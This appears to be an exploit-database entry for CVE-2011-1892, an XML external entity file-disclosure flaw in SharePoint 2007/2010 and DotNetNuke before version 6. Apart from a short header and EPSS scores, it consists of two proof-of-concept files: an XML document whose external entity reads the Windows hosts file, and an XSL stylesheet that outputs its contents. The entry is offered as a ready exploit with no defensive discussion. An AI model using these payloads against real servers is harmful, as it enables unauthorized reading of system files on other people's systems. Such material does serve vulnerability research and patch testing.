SharePoint 2007/2010 and DotNetNuke < 6 - File disclosure via XEE

2014-07-0100:00:00

Root

www.seebug.org

0.027 Low

EPSS

Percentile

89.4%

JSON

No description provided by source.


                                                Exploit Title: File disclosure via XEE in SharePoint and DotNetNuke
Date: September 15, 2011
Author: Nicolas Gregoire
Version: SharePoint 2007 / 2010, DotNetNuke &#60; 6
CVE : CVE-2011-1892

poc filename: xee.xml

&#60;!DOCTYPE doc [
&#60;!ENTITY boom SYSTEM &#34;c:\\windows\\system32\\drivers\\etc\\hosts&#34;&#62;
]&#62;
&#60;doc&#62;&boom;&#60;/doc&#62;

poc filename: xee.xsl

&#60;xsl:stylesheet version=&#34;1.0&#34; xmlns:xsl=&#34;http://www.w3.org/1999/XSL/Transform&#34;&#62;
        &#60;xsl:template match=&#34;/&#34;&#62;
        &#60;xsl:apply-templates/&#62;
                &#60;xsl:value-of select=&#34;doc&#34;/&#62;
        &#60;/xsl:template&#62;
&#60;/xsl:stylesheet&#62;

0.027 Low

EPSS

Percentile

89.4%

JSON

Related for SSV:72143